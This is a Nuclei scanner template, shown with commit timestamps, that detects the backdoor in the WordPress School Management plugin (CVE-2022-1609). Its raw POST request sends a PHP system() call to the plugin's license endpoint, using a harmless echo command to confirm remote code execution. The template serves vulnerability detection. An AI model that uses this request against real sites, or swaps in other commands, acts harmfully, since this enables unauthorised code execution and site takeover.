nuclei-templates/cves/2022/CVE-2022-1609.yaml

40 lines
1.1 KiB
YAML
Raw Normal View History

2022-05-26 06:25:43 +00:00
id: CVE-2022-1609
info:
name: The School Management < 9.9.7 - Remote Code Execution
2022-05-26 06:25:43 +00:00
author: For3stCo1d
severity: critical
description: The School Management plugin before version 9.9.7 contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site.
2022-05-26 06:25:43 +00:00
reference:
2022-05-27 07:14:13 +00:00
- https://wpscan.com/vulnerability/e2d546c9-85b6-47a4-b951-781b9ae5d0f2
2022-05-26 06:25:43 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1609
2022-05-27 07:14:13 +00:00
metadata:
verified: false
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cve-id: CVE-2022-1609
cwe-id: CWE-77
2022-05-31 08:44:45 +00:00
tags: cve,cve2022,wordpress,rce,wp,backdoor
2022-05-26 06:25:43 +00:00
variables:
2022-05-27 07:14:13 +00:00
cmd: "echo CVE-2022-1609 | rev"
2022-05-26 06:25:43 +00:00
requests:
- raw:
- |
POST /wp-json/am-member/license HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2022-05-27 07:14:13 +00:00
blowfish=1&blowf=system('{{cmd}}');
2022-05-26 06:25:43 +00:00
matchers-condition: and
matchers:
- type: word
2022-05-31 08:44:45 +00:00
part: body
2022-05-26 06:25:43 +00:00
words:
2022-05-27 07:14:13 +00:00
- '9061-2202-EVC'
# Enhanced by mp on 2022/05/27